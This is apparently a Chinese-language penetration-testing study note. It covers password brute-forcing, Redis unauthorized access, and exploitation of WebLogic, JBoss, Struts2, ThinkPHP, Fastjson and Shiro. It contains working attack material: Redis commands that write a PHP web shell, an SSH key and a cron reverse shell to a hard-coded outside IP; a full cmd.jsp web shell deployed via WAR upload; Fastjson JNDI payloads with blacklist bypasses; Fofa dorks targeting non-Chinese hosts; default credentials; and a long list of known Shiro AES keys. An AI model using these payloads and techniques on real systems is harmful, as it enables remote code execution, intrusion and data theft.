漏洞攻击利用

弱口令密码破解

常用的密码网站

https://forum.ywhack.com/password.php

https://github.com/ibaiw/2023Hvv/blob/main/默认密码.md

弱密码破解方法

密码破解方法简绍

指用枚举的方式来爆破用户信息。具体的流程是用事先收集好的数据集成一个字典，然后用字典不断进行枚举，直到枚举成功
暴力破解工具

BurpSuite （使用的反应，成功与否的大小反应不一样）

Hydra

Metasploit

SNETCracker：https://github.com/shack2/SNETCracker
暴力破解的字典

Default Password

历年弱口令的top100，github上搜索弱口令字典

https://github.com/k8gege/PasswordDic

https://github.com/danielmiessler/SecLists

https://192-168-1-1ip.mobi/default-router-passwords-list/ https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/def ault-passwords.csv

https://github.com/Dormidera/WordList-Compendium

创建自定义字典

参考网上的软件，下面拿出一个简绍

pydictor

https://github.com/LandGrey/pydictor

暴力破解的场景

不含验证码的后台
不失效的验证码

 各种常见应用程序，比如：**phpmyadmin、tomcat、mysql**  

 各种协议：FTP、SSH、RDP等  

 爆破大马

爆破方法

BP抓包

未授权访问漏洞

没有权限却可以访问

导致其他用户可以无需认证授权直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露

常见的未授权的漏洞

Redis 未授权访问漏洞

Docker 未授权访问漏洞

MongoDB 未授权访问漏洞

Jenkins未授权访问漏洞

Memcached 未授权访问漏洞

JBOSS 未授权访问漏洞

VNC 未授权访问漏洞

ZooKeeper 未授权访问漏洞

Rsync 未授权访问漏洞

Atlassian Crowd 未授权访问漏洞

CouchDB 未授权访问漏洞

Elasticsearch 未授权访问漏洞

Hadoop 未授权访问漏洞

Jupyter Notebook 未授权访问漏洞

redis未授权访问

redis简介

Redis 是完全开源免费的，一个灵活的高性能 key-value 数据结构存储，可以用来作为数据库、缓存和消息队列。
redisd的框架

Redis 主要由有两个程序组成：

Redis 客户端 redis-cli

Redis 服务器 redis-server
应用场景
- 存储缓存数据
- 需要高速读写的场合使用它高速读写
漏洞发现

redis默认监听端口是6379

MongoDB：27017

Memcached：11211

Jboss：8080

VNC：5900、5901

Docker：2375
要确定对方是否开启redis服务，可以看是否开启了6379端口

但是使用者而可能更改了端口服务
- 端口探测
  
  nmap -v -Pn -p 6379 -sV IP
redis常用的指令

redis连接远程服务器

redis-cli -h host -p port -a password

set testkey “testvalue” 设置testkey的值为testvalue

get testkey 获取testkey

set score 99 设置score的值为99

incr score 将score的值增加一

get score 获取score的值

keys *

列出所有的Key,注意没有values操作

config set dir /home/test 设置工作的目录是/home/test

config set dbfilename redis.rdb 设置备份文件名

config get dir 检查工作目录是否设置成功

config get dbfilename 检查备份文件名是否设置成功

save 进行一次备份操作

flushall 删除所有的数据

del key 删除 key的数据
redis的历史漏洞
- redis未授权漏洞
漏洞利用
- 环境搭建
  
  dicker-compose.yml
- 也可以使用下面的环境
- 写webshell
  
  条件知道根目录
  
  然后redis的未授权漏洞，我们可以上传我们的php一句话木马
  
  具体的步骤如下
  
  redis-cli -h host -p port
  
  config set dir 所知道的根目录路径
  
  config set dbfilename shell.php
  
  set x <? @_eval($_POST[‘value’]);?>
  
  save
- getshell
  
  我们只需要使用我们上传的路径指定位置，然后使用post传参，相当于得到了他的shell
- 写ssh公钥
  
  0x00
  
  先生成ssh密钥
  
  ssh-keygen -t rsa
  
  (echo -e “\n\n”; cat ~/.ssh/id_rsa.pub; echo -e “\n\n”) > /tmp/foo.txt cat /tmp/foo.txt | redis-cli -h 122.114.225.148 -p 6379 -x set m
  
  有很多\n的原因是因为需要把不同的密钥分开
- 写定时任务
  
  redis-cli -h 122.114.225.148 -p 6379
  
  config set dir /var/spool/cron
  
  config set dbfilename root
  
  set xxx “\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/124.71.45.28/4433 0>&1\n\n”
  
  save

常见中间件漏洞

weblogic

简介

WebLogic Server是美国甲骨文（Oracle）公司开发的一款适用于云环境和传统环境的应用服务中间件，确切的说是一个基于JavaEE架构的中间件，它提供了一个现代轻型开发平台，用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
特性

默认端口：7001

Web界面：Error 404–Not Found

控制后台：http://ip:端口/console

注意这个console，他会跳转到登录界面
历史漏洞

Weblogic 10.3.6.0

Weblogic 12.1.3.0

Weblogic 12.2.1.1

Weblogic 12.2.1.2

Weblogic 12.2.1.3

Weblogic 14.1.1.0
漏洞环境搭建

我的建议是，使用vulhub里面的环境使用docker-compose搭建

漏洞利用

weakPassword

账号：weblogic

密码：Oracle@123

system/password

system/Passw0rd

weblogic/weblogic

admin/security

joe/password

mary/password

system/security

wlcsystem/wlcsystem

wlpisystem/wlpisystem

cmd.jsp

<%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output
= ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while
((s = sI.readLine()) != null) { output += s +"\r\n"; } } catch(IOException e) { e.printSta
ckTrace(); } } out.println(output);%>

这段脚本的意思，就是创建一个执行环境，我们可以使用命令，他来执行

打包war包

jar -cvf cmd.war cmd.jsp
上传war包

这里需要使用weakPassword进行登录后台

部署->安装->上载文件->选择文件->下一步

记得选择.war文件

下一步，下一步，完成

但是这里出现了报错
如果顺利进行

就可以getshell了

同时也可以使用蚁剑等软件

java 开发框架漏洞

JBOSS漏洞

JBOSS简介

一个基于J2EE的开放源代码的应用服务器

JBoss 是一个管理 EJB 的容器和服务器，但 JBoss 核心服务不包括支持 servlet/JSP 的WEB容器，一般与Tomcat或Jetty绑定使用。Jboss是 Java EE 应用服务器（就像Apache是web服务器一样），专门用来运行Java EE程序的
JBOSS历史漏洞
- 访问控制不严格导致的漏洞
  
  JMX Console未授权访问Getshell
  
  Administration Console 弱口令 Getshell
  
  CVE-2007-1036 – JMX Console HtmlAdaptor Getshell
  
  CVE-2010-0738 – JMX控制台安全验证绕过漏洞
- 反序列化
  
  CVE-2013-4810 – JBoss EJBInvokerServlet 反序列化漏洞
  
  CVE-2015-7501 – JBoss JMXInvokerServlet 反序列化漏洞
  
  CVE-2017-7504 – JBoss 4.x JBossMQ JMS 反序列化漏洞
  
  CVE-2017-12149 – JBosS AS 6.X 反序列化漏洞
JBOSS漏洞的发现

只要出现以下的场景就会出现
JBOSS历史漏洞的利用
1. JMX Console 未授权访问漏洞
  
  Jboss的webUI界面 http://ip:port/jmx-console 未授权访问(或默认密码 admin/admin)，可导致JBoss的部署管理的信息泄露，攻击者也可以直接上传木马获取 webshell
2. 发现
  
  由于只用JBOSS搭建的，我们可以试探性的访问
  
  http://xx.xx.xx.xx/jmx-console/
  
  看是否存在漏洞，如果访问成功就说明存在罗漏洞
3. 漏洞利用
  
  原理和weblogic是一致的
  - 远程部署war包
    
    找到 jboss.deployment 选项 (Jboss自带的部署功能）中的
    
    flavor=URL,type=DeploymentScanner点进去（通过 url 的方式远程部署）
    
    也可以直接输入以下URL进入：
    
    也可以输入URL进入
    
    http://xx.xx.xx.xx:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deploymen
    
    t:type=DeploymentScanner,flavor=URL
    
    进入页面后找到void addURL()
    
    下面是部署远程的war包木马
    
    # 打包冰蝎jsp马为war包
    
    jar -cvf shell.war shell.jsp
    
    # 在vps上启动web服务
    
    python -m http.server
    
    # war包下载地址
    
    http://vps-IP:8000/shell.war
    
    然后后点击Invoke部署
    
    随后点击 Back to MBean View来到 URLList 中查看 Value 值是否已经部署好，并且为我们的远程war木马地址
    
    最后点击 Apply Changes 后耐心等待一会儿，然后回到 JMX-Console 目录中
    
    注意：等待的时间是有点长的
    
    返回jmx-console 目录找到 jboss.web.deployment 查看是否存在我们部署的war木马
    
    等到部署成功我们可以使用webshell管理程序

Struts2漏洞

简介

Apache Struts是美国阿帕奇（Apache）软件基金会负责维护的一个开源项目，是一套用于创建企业级

Java Web 应用的开源MVC框架，主要提供两个版本框架产品： Struts1和Struts2；Struts2是一个基于

MVC设计模式的Web应用框架，它本质上相当于一个servlet，在MVC设计模式中，Struts2作为控制器

(Controller)来建立模型与视图的数据交互。Struts2是Struts的下一代产品，是在 struts1和WebWork的

技术基础上进行了合并的全新的Struts2框架。
历史漏洞
历史漏洞原理分析

https://tttang.com/archive/1583

https://su18.org/post/struts2-5/
环境建议使用vulhub
漏洞发现

https://github.com/HatBoy/Struts2-Scan

https://github.com/Guaang/s2-tool

https://github.com/shack2/Struts2VulsTools
历史漏洞利用

php开发框架漏洞

thinkphp

简介

Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的，所以 thinkphp 出问题的话，会影响很多基于 thinkphp开发的网站。
历史漏洞
漏洞发现

这个报错就出现了他的版本信息
- 使用Fofa
  
  header=”thinkphp” && country!=”CN”
  
  header=”thinkphp” && country!=”CN” && title=”后台管理”
  
  header=”thinkphp”&&country!=”CN” && title=”后台管理” && after=”2021-01-01”
漏洞利用

FastJson漏洞

简介

Fastjson是阿里巴巴公司开源的一款JSON解析器，它可以解析 JSON 格式的字符串，是一个 Java

库，支持将 Java Bean 序列化为 JSON 字符串，也可以从 JSON 字符串反序列化到 Java Bean。

可以将 Java 对象转换为 JSON 格式，当然它也可以将 JSON 字符串转换为 Java 对象。

Fastjson 可以操作任何 Java 对象，即使是一些预先存在的没有源码的对象。

https://www.runoob.com/w3cnote/fastjson-intro.html
历史漏洞

Fastjson <=1.2.24 反序列化远程命令执行漏洞

Fastjson <=1.2.41 反序列化远程命令执行漏洞

Fastjson <=1.2.42 反序列化远程命令执行漏洞

Fastjson <=1.2.43 反序列化远程命令执行漏洞

Fastjson <=1.2.45 反序列化远程命令执行漏洞

Fastjson <=1.2.47 反序列化远程命令执行漏洞

Fastjson <=1.2.62 反序列化远程命令执行漏洞

Fastjson <=1.2.66 反序列化远程命令执行漏洞
- FastJson < 1.2.41
第一个Fastjson反序列化漏洞爆出后，阿里在1.2.25版本设置了autoTypeSupport属性默认alse，并且增加了checkAutoType()函数，通过黑白名单的方式来防御Fastjson反序列化漏洞，因此后面发现的Fastjson反序列化漏洞都是针对黑名单绕过来实现攻击利用的目的的。com.sun.rowset.jdbcRowSetlmpl在1.2.25版本被加入了黑名单，Fastjson有个判断条件判断类名是否以”L”开头、以”;”结尾，是的话就提取出其中的类名在加载进来那么就可以构造如下EXP

{“@type”:”Lcom.sun.rowset.JdbcRowSetImpl;”, “dataSourceName”:”rmi://ip:9999/rce_1_2_24_e

xploit”, “autoCommit”:true}
- FastJson < 1.2.42
  
  阿里在发现这个绕过漏洞之后做出了类名如果为L开头;结尾的时候就先去掉L和;进行黑名单检验的方法，但是没有考虑到双写或多写的情况，也就是说这种方法只能防御一组L和;，构造exp如下，即双写L和;
  
  {“@type”:”LLcom.sun.rowset.JdbcRowSetImpl;;”, “dataSourceName”:”rmi://x.x.x.x:9999/exp”,
  
  “autoCommit”:true}
- FastJson < 1.2.47
  
  在1.2.47版本及以下的情况下，loadClass中默认cache为true，首先使用java.lang.Class把获取到的类缓存到mapping中，然后直接从缓存中获取到了com.sun.rowset.jdbcRowSetlmpl这个类，即可绕过黑名单
  
  { “a”: { “@type”: “java.lang.Class”, “val”: “com.sun.rowset.JdbcRowSetImpl” }, “b”: {
  
  “@type”: “com.sun.rowset.JdbcRowSetImpl”, “dataSourceName”: “rmi://ip:9999/exp”, “auto
  
  Commit”: true }}
- FastJson < 1.2.66
  
  基于黑名单绕过，autoTypeSupport属性为true才能使用，在1.2.25版本之后autoTypeSupport默认为false
  
  {“@type“:”org.apache.shiro.jndi.JndiObjectFactory”,”resourceName”:”ldap://ip:1389/Calc”}
  
  {“@type“:”br.com.anteros.dbcp.AnterosDBCPConfig”,”metricRegistry”:”ldap://ip:1389/Calc”}
  
  {“@type“:”org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup”,”jndiNames”:”ldap://ip:1389/Calc”}
漏洞发现
- json认识
  
  https://www.runoob.com/json/json-tutorial.html
- FastJson寻找
  
  Fastjson的作用是用于对JSON格式的数据进行解析和打包，所以出现Json格式的地方，就有可能使用了Fastjson
- FastJson报错识别 必须是一行 ，所以我们需要json格式化的东西
- FastJson漏洞发现
  
  原理：java.net.InetAddress 这个类在实例化时会尝试对 example.com 进行域名解析，这时候可以通过 dnslog 的方式得知漏洞是否存在
  
  http://dnslog.cn
  
  https://www.callback.red
  
  https://github.com/AlphabugX/Alphalog
  
  https://github.com/BugScanTeam/DNSLog
  
  https://github.com/lanyi1998/DNSlog-GO
  
  https://github.com/lijiejie/eyes.sh
  
  {
  
  “name”:{
  
  “@type”:”java.net.InetAddress”,
  
  “val”:”mingy.qydzoe.dnslog.cn”
  
  }
  
  }
  
  防止被黑名单
  
  {
  
  “name”:{
  
  “@type”:”LLjava.net.InetAddress;;”,
  
  “val”:”mingy.qydzoe.dnslog.cn”
  
  }
  
  }
漏洞利用

Shiro漏洞

简介

Apache Shiro是一种功能强大且易于使用的Java安全框架，它执行身份验证、授权、加密和会话管理，可用于保护任何应用程序的安全。

Shiro提供了应用程序安全性API来执行以下方面：

1）身份验证：证明用户身份，通常称为用户”登录”；

2）授权：访问控制；

3）密码术：保护或隐藏数据以防窥视；

4）会话管理：每个用户的时间敏感状态。

上述四个方面也被称为应用程序安全性的四个基石。
漏洞发现
- 组件识别
  
  在访问及登录时抓包，如果响应头set-cookie中显示rememberMe=deleteMe，说明使用了Shiro组
  
  件
- 漏洞搜索
  
  通过fofa、zoomeye、shodan这类平台搜索相关特征来发现目标。
  
  例如fofa的搜索关键词：
  
  header=”rememberme=deleteMe”
  
  header=”shiroCookie”

历史漏洞

Shiro-550

CVE-2016-4437 Shiro rememberMe 反序列化远程代码执行漏洞

Apache Shiro 框架提供了记住密码的功能（RememberMe），关闭浏览器再次访问时无需再登录即

可访问。用户登录成功后用户信息会经过加密编码后存储在cookie中。在 Cookie 读取过程中有用

AES 对 Cookie 值解密的过程，对于 AES 这类对称加密算法，一旦秘钥泄露加密便形同虚设。若秘钥可控，同时 Cookie 值是由攻击者构造的恶意 Payload，就可以将流程走通，触发危险的 Java 反序列化，从而导致远程命令执行漏洞。

shiro 默认使用了CookieRememberMeManager，其处理cookie的流程是：

获取 rememberMe的cookie值–>Base64解码–>AES解密 –>反序列化 。

但是AES加密的密钥Key被硬编码(密钥初始就被定义好不能动态改变的)在代码里，这就意味着每个人通过源代码都能拿到AES加密的密钥。因此，攻击者可以构造一个恶意的对象，并且对其序列化、AES加密、base64编码后，作为 cookie 的 rememberMe 字段发送。Shiro将rememberMe进行解密并且反序列化，最终就造成了反序列化的RCE漏洞。

只要rememberMe的AES加密密钥泄露，无论shiro是什么版本都可能会导致该漏洞的产生。硬编码是将数据直接嵌入到程序或其他可执行对象的源代码中。如果在返回包的 Set-Cookie 中存在rememberMe=deleteMe 字段，那么就可能存在此漏洞。

常见的kry值：

fCq+/xW488hMTCD+cmJ3aQ==
kPH+bIxk5D2deZiIxcaaaA==
2AvVhdsgUs0FSA3SDFAdag==
3AvVhmFLUs0KTA3Kprsdag==
4AvVhmFLUs0KTA3Kprsdag==
5aaC5qKm5oqA5pyvAAAAAA==
6ZmI6I2j5Y+R5aSn5ZOlAA==
bWljcm9zAAAAAAAAAAAAAA==
wGiHplamyXlVB11UXWol8g==
zSyK5Kp6PZAAjlT+eeNMlg==
Z3VucwAAAAAAAAAAAAAAAA==
MTIzNDU2Nzg5MGFiY2RlZg==
bXdrXl9eNjY2KjA3Z2otPQ==
1QWLxg+NYmxraMoxAXu/Iw==
ZUdsaGJuSmxibVI2ZHc9PQ==
L7RioUULEFhRyxM7a2R/Yg==
r0e3c16IdVkouZgk1TKVMg==
bWluZS1hc3NldC1rZXk6QQ==
a2VlcE9uR29pbmdBbmRGaQ==
WcfHGU25gNnTxTlmJMeSpw==
ZAvph3dsQs0FSL3SDFAdag==
tiVV6g3uZBGfgshesAQbjA==
cmVtZW1iZXJNZQAAAAAAAA==
ZnJlc2h6Y24xMjM0NTY3OA==
RVZBTk5JR0hUTFlfV0FPVQ==
WkhBTkdYSUFPSEVJX0NBVA==
GsHaWo4m1eNbE0kNSMULhg==
l8cc6d2xpkT1yFtLIcLHCg==
KU471rVNQ6k7PQL4SqxgJg==
0AvVhmFLUs0KTA3Kprsdag==
1AvVhdsgUs0FSA3SDFAdag==
25BsmdYwjnfcWmnhAciDDg==
3JvYhmBLUs0ETA5Kprsdag==
6AvVhmFLUs0KTA3Kprsdag==
6NfXkC7YVCV5DASIrEm1Rg==
7AvVhmFLUs0KTA3Kprsdag==
8AvVhmFLUs0KTA3Kprsdag==
8BvVhmFLUs0KTA3Kprsdag==
9AvVhmFLUs0KTA3Kprsdag==
OUHYQzxQ/W9e/UjiAGu6rg==
a3dvbmcAAAAAAAAAAAAAAA==
aU1pcmFjbGVpTWlyYWNsZQ==
bXRvbnMAAAAAAAAAAAAAAA==
OY//C4rhfwNxCQAQCrQQ1Q==
5J7bIJIV0LQSN3c9LPitBQ==
f/SY5TIve5WWzT4aQlABJA==
bya2HkYo57u6fWh5theAWw==
WuB+y2gcHRnY2Lg9+Aqmqg==
3qDVdLawoIr1xFd6ietnwg==
YI1+nBV//m7ELrIyDHm6DQ==
6Zm+6I2j5Y+R5aS+5ZOlAA==
2A2V+RFLUs+eTA3Kpr+dag==
6ZmI6I2j3Y+R1aSn5BOlAA==
SkZpbmFsQmxhZGUAAAAAAA==
2cVtiE83c4lIrELJwKGJUw==
fsHspZw/92PrS3XrPW+vxw==
XTx6CKLo/SdSgub+OPHSrw==
sHdIjUN6tzhl8xZMG3ULCQ==
O4pdf+7e+mZe8NyxMTPJmQ==
HWrBltGvEZc14h9VpMvZWw==
rPNqM6uKFCyaL10AK51UkQ==
Y1JxNSPXVwMkyvES/kJGeQ==
lT2UvDUmQwewm6mMoiw4Ig==
MPdCMZ9urzEA50JDlDYYDg==
xVmmoltfpb8tTceuT5R7Bw==
c+3hFGPjbgzGdrC+MHgoRQ==
ClLk69oNcA3m+s0jIMIkpg==
Bf7MfkNR0axGGptozrebag==
1tC/xrDYs8ey+sa3emtiYw==
ZmFsYWRvLnh5ei5zaGlybw==
cGhyYWNrY3RmREUhfiMkZA==
IduElDUpDDXE677ZkhhKnQ==
yeAAo1E8BOeAYfBlm4NG9Q==
cGljYXMAAAAAAAAAAAAAAA==
2itfW92XazYRi5ltW0M2yA==
XgGkgqGqYrix9lI6vxcrRw==
ertVhmFLUs0KTA3Kprsdag==
5AvVhmFLUS0ATA4Kprsdag==
s0KTA3mFLUprK4AvVhsdag==
hBlzKg78ajaZuTE0VLzDDg==
9FvVhtFLUs0KnA3Kprsdyg==
d2ViUmVtZW1iZXJNZUtleQ==
yNeUgSzL/CfiWw1GALg6Ag==
NGk/3cQ6F5/UNPRh8LpMIg==
4BvVhmFLUs0KTA3Kprsdag==
MzVeSkYyWTI2OFVLZjRzZg==
empodDEyMwAAAAAAAAAAAA==
A7UzJgh1+EWj5oBFi+mSgw==
c2hpcm9fYmF0aXMzMgAAAA==
i45FVt72K2kLgvFrJtoZRw==
U3BAbW5nQmxhZGUAAAAAAA==
Jt3C93kMR9D5e8QzwfsiMw==
MTIzNDU2NzgxMjM0NTY3OA==
vXP33AonIp9bFwGl7aT7rA==
V2hhdCBUaGUgSGVsbAAAAA==
Q01TX0JGTFlLRVlfMjAxOQ==
Is9zJ3pzNh2cgTHB4ua3+Q==
NsZXjXVklWPZwOfkvk6kUA==
GAevYnznvgNCURavBhCr1w==
66v1O8keKNV3TTcGPK1wzg==
SDKOLKn2J1j/2BHjeZwAoQ==
kPH+bIxk5D2deZiIxcabaA==
kPH+bIxk5D2deZiIxcacaA==
3AvVhdAgUs0FSA4SDFAdBg==
4AvVhdsgUs0F563SDFAdag==
FL9HL9Yu5bVUJ0PDU1ySvg==
5RC7uBZLkByfFfJm22q/Zw==
eXNmAAAAAAAAAAAAAAAAAA==
fdCEiK9YvLC668sS43CJ6A==
FJoQCiz0z5XWz2N2LyxNww==
HeUZ/LvgkO7nsa18ZyVxWQ==
HoTP07fJPKIRLOWoVXmv+Q==
iycgIIyCatQofd0XXxbzEg==
m0/5ZZ9L4jjQXn7MREr/bw==
NoIw91X9GSiCrLCF03ZGZw==
oPH+bIxk5E2enZiIxcqaaA==
QAk0rp8sG0uJC4Ke2baYNA==
Rb5RN+LofDWJlzWAwsXzxg==
s2SE9y32PvLeYo+VGFpcKA==
SrpFBcVD89eTQ2icOD0TMg==
U0hGX2d1bnMAAAAAAAAAAA==
Us0KvVhTeasAm43KFLAeng==
Ymx1ZXdoYWxlAAAAAAAAAA==
YWJjZGRjYmFhYmNkZGNiYQ==
zIiHplamyXlVB11UXWol8g==
ZjQyMTJiNTJhZGZmYjFjMQ==
2AvVCXsxUs0FSA7SYFjdQg==
2AvVhdsgERdsSA3SDFAdag==
2AvVhdsgUs0FSA3SDFAder==
2AvVhdsgUs0FSA3SaFAdfg==
2AvVhdsgUsOFSA3SDFAdag==
2AvVhmFLUs0KTA3Kprsdag==
2AvVidsaUSofSA3SDFAdog==
2adsfasdqerqerqewradsf==
3Av2hmFLAs0BTA3Kprsd6E==
3AvVhMFLIs0KTA3Kprsdag==
3AvVhdAgUs1FSA4SDFAdBg==
3AvVhmFLUs0KTA3KaTHGFg==
3qDVdLawoIr1xFd6ietnsg==
3rvVhmFLUs0KAT3Kprsdag==
4AvVhm2LUs0KTA3Kprsdag==
4AvVhmFLUs0KTA3KAAAAAA==
4AvVhmFLUs0KTA3Kprseaf==
4AvVhmFLUs0TTA3Kprsdag==
4AvVhmFLUs5KTA1Kprsdag==
4AvVhmFLUsOKTA3Kprsdag==
4WCZSJyqdUQsije93aQIRg==
4rvVhmFLUs0KAT3Kprsdag==
5AvVhCsgUs0FSA3SDFAdag==
5oiR5piv5p2h5ZK46bG8IQ==
8AvVhdsgUs0FSA3SDFAdag==
9AVvhnFLuS3KTV8KprsdAg==
9Ami6v2G5Y+r5aPnE4OlBB==
A+kWR7o9O0/G/W6aOGesRA==
AF05JAuyuEB1ouJQ9Y9Phg==
AztiX2RUqhc7dhOzl1Mj8Q==
B9rPF8FHhxKJZ9k63ik7kQ==
Cj6LnKZNLEowAZrdqyH/Ew==
FP7qKJzdJOGkzoQzo2wTmA==
FjbNm1avvGmWE9CY2HqV75==
GHxH6G3LFh8Zb3NwoRgfFA==
GhrF5zLfq1Dtadd1jlohhA==
HOlg7NHb9potm0n5s4ic0Q==
M2djA70UBBUPDibGZBRvrA==
QDFCnfkLUs0KTA3Kprsdag==
QF5HMyZAWDZYRyFnSGhTdQ==
QUxQSEFNWVNPRlRCVUlMRA==
QVN1bm5uJ3MgU3Vuc2l0ZQ==
R29yZG9uV2ViAAAAAAAAAA==
TGMPe7lGO/Gbr38QiJu1/w==
UGlzMjAxNiVLeUVlXiEjLw==
YVd4dmRtVjViM1UlM0QIdn==
YWdlbnRAZG1AMjAxOHN3Zg==
YnlhdnMAAAAAAAAAAAAAAA==
YystomRZLMUjiK0Q1+LFdw==
Z3VucwAAAAAAAAAAAAABBB==
Z3VucwACAOVAKALACAADSA==
ZGdmdwAAAAAAAAAAAAAAAA
ZUdsaGJuSmxibVI2ZHc9PQ
aG91c2Vob3VzZWhvdXNlMg==
b2EAAAAAAAAAAAAAAAAAAA==
c2hvdWtlLXBsdXMuMjAxNg==
duhfin37x6chw29jsne45m==
fCq+/xW488hMTCE+cmJ3FF==
kPv59vyqzj00x11LXJZTjJ2UHW48jzHN
lt181dcQVz/Bo9Wb8ws/Cg==
mIccZhQt6EBHrZIyw1FAXQ==
pbnA+Qzen1vjV3rNqQBLHg==
pyyX1c5x2f0LZZ7VKZXjKO==
qQFtSnnj/sx7vu51ixAyEQ==
sBv2t3okbdm3U0r2EVcSzB==
sgIQrqUVxa1OZRRIK3hLZw==
w793pPq5ZVBKkj8OhV4KaQ==
wrjUh2ttBPQLnT4JVhriug==
wyLZMDifwq3sW1vhhHpgKA==
AsfawfsdfaAasdWWW==
LEGEND-CAMPUS-CIPHERKEY==
ZWvohmPdUsAWT3=KpPqda
dsesfswfjn23409isfad2==
m0@5ZZ9L4jjQXn7MREp^b^7I
YTM0NZomIzI2OTsmIzM0NTueYQ==
Z3h6eWd4enklMjElMjElMjE=
4AvVhmFLUs0KTA3Kprsdcg==
+1pbesZjg+S6peSDyfAXRg==
+QJM+wFrfOeHtK5LygPKTw==
+RVeD7SZGjcDDjWP9Z8C3w==
+RrBOj1VB+ddMkyE3x68Zw==
+VMJeSsvKaxwJAZZ1hblBQ==
+YblQXFNIzeXbAeVHNweQg==
+cEp2B6cNDcaOYVoDLfQ6Q==
+eymeZd19l/86RGLFONUKQ==
+lcLFAA1yxmFcAuk9qyD9Q==
+vrdvOXgTEaNOjdFBzRNtg==
/2/uKHXDN4a+BEmBcMLDeA==
/8YvdnG+rQJJHMfnH39saw==
/MY7M9QQuIDQG85dlRMJvg==
/QEmZ7iT7D3pj66Sw03E/g==
/V2P6mmLlk7I9Ke6NaqsoA==
/kqpXbaVg8+Mhao6SIxHog==
/nPSgNUwEh4zqY9l5zb0bA==
/sLIpUl2/OiffIc5clPTYQ==
/tpr5CMddtY9FziFFfrHMA==
/yXsA+EB5DnLoJo5Z9CXPw==
/zFVooPJ56jNvd13SFUGNg==
07lQjaDPEgxgFhmSnBqM8g==
09rhOoTPDaH1ljnc0076Aw==
0GTL0kjOhhS6V8Svqu8xrw==
0H95dRmBRrrvn8MIG/DRKg==
0KqPNEcL1Y49k5rstQHQaA==
0RHWwBRW/5mX/v9c9skbIg==
0S8aBnbt6jv3m4JFxw5Weg==
0SDzLtJ8UuoRzfsxKzPE5w==
0XtKyENo4oWCvETi+03Hog==
0YLZUNY6flkRCCSA7vMe0A==
0cRUHddgjatn1COPtwaQvQ==
0ffr1y8Ssug0EV2/YJOJuQ==
0hMZEy8OroEKsK0kN6AQQA==
0mG2OTtoTs2Y89WTju+7pQ==
0vOR4C9LYcm08vaDSfBXfw==
1/s4/bFFYBB8O0k8Ldj0hw==
12fHAgOxlxTpryIUbz+F8Q==
1CI56vLMJzmliETlqMVf+A==
1LGmqbv4LV+JGbDEy48kDA==
1V3vxLUapbDLCXn18sXjJA==
1XErOMoWXqZqXKKdfKmSyA==
1ZRhDKYjjiUsr+dTh+RLSQ==
1aO2nAnn8z2EOF3Q16oh1Q==
1bzZDJ4csrla1+c7jrVRFg==
271KmY3+KvUh2sBSApKm/Q==
2AD5qdyUxmuHAPeTjVavtg==
2EGezjl919ObkTcLdtSQfA==
2K0Ul3Uyf0ISYN4EWJ/KFA==
2KrgmHewPOOD74594m2Kaw==
2MXfsNLrlhQHdJDGfOU+uQ==
2RKhgkEYQ5HuJoopGypdZw==
35jO+rcK0gVSbiz8EBU/Ng==
36+uSbxl5y2IWpTvhJ4TaQ==
39aIK53enFDDL5m3YKqOzQ==
3E92o3ZEfPs1R97EGb0CFQ==
3GhvvedFFWwBFoy79XHNNw==
3Op6LjBuEEzTEIxw/ssdrQ==
3YZizJpixP/LihPJZuzUeA==
3qUg2oom36xN6dEML/+DCA==
3qtbwjEqsAAKRNcUsPG6oQ==
3wTQWkiwIkt69WWpuPF05w==
3yKGEeoL3UuSheG88Xj0Dw==
3zAW7kCci5liNJ+mpMEMYQ==
3zB7MxgDvrohItkxzKaXYw==
40QGucfe7ezeee7VWsVTyQ==
45ZNU2QNlfn2MpMhhIgzWw==
47MjsnX27weP77kZ/PYJDQ==
4AvVhmFLUs0KTA3KprSdAg==
4QarltgBQ/Y3AkDr5Ege4A==
4R5dUAiiks37jE89c71K9A==
4ULGKcagW9PZi8tkB2kuGw==
4XLSlSa2QjQ11Oivfg9Mrg==
4ctN4etEzkKHlu2YtseiDw==
4mV3efu4c8b1FPlTUKGwsg==
4uwHqqrGg7rS3gdvhL3ZZw==
4zRMjhBbEYT+o+xapa1Zjw==
506RGgcNE31pDjwlWDiwxA==
54bzYW9QWJvnaHtphT6Eow==
54mW1bYsq9A5UU1hhanXtA==
56JhCmN0cpkT9M+OmgtcsA==
56NW7+Za661wp5ppefIOqA==
57yx2QDYQeRH4mLhJRALVw==
59fN/AcWCzQHJaolntHsmA==
5CtfxSr4VezPKEPq6yOa9Q==
5FFlaVMw4+7zCOhvIw3uuQ==
5Iwm76a/AvJM1J9RkNUmGQ==
5K2d4Q1PwnGUB6GVO8QOMA==
5KvT9MLa0ymIoLgh3RKexw==
5Nh9k0+fZfeKSx5j0ucxIA==
5P/GjvgJghEDSo4kEtrssA==
5QhsHiHWqcq1XUzACwCi3A==
5WWE+MoCJ6j2r7OlAmDrqw==
5WkLnbfXx7Cy1/ofLnt9Ew==
5hUx1oXMN3mbn/gLgidUaw==
5mW+3H9iaABI9+jnnKtWPQ==
5rPhukmqC4KAa6T88uTp6Q==
5wasyUGKKm3aiseLvFmmYg==
5xTa/RH7CcBf5Y/n4U0lkQ==
6+8FnOFjYxzh/1J8R7WEhA==
6/69OoWKWL+zcTiIG8WTag==
66InzvlSOqPwXSjtZ5Ev9g==
6CriZafvxrM7Wmv8B7m5Kw==
6IxMUkxgl0GY7FeHXRkvBA==
6MFZ3yw1i3EyCEnjFTvzpg==
6NmINZLmvrFkEP2Oo0gTrA==
6SOZM51g46dAJrWVrWJEjA==
6TmQChE+a/TsZouL/9IV0A==
6WD3jm9uiwdH7y5aI3f6NQ==
6bNrn06EaUqB3JJTLKPf6w==
6f67ztlb3iuKi3Ln8OeDlg==
6pcKolcRorUvxww+6aeTMQ==
6pxCDD2lP8HhJrBR1asM3g==
6r7NmGlHDcGA0ftjmsdG2Q==
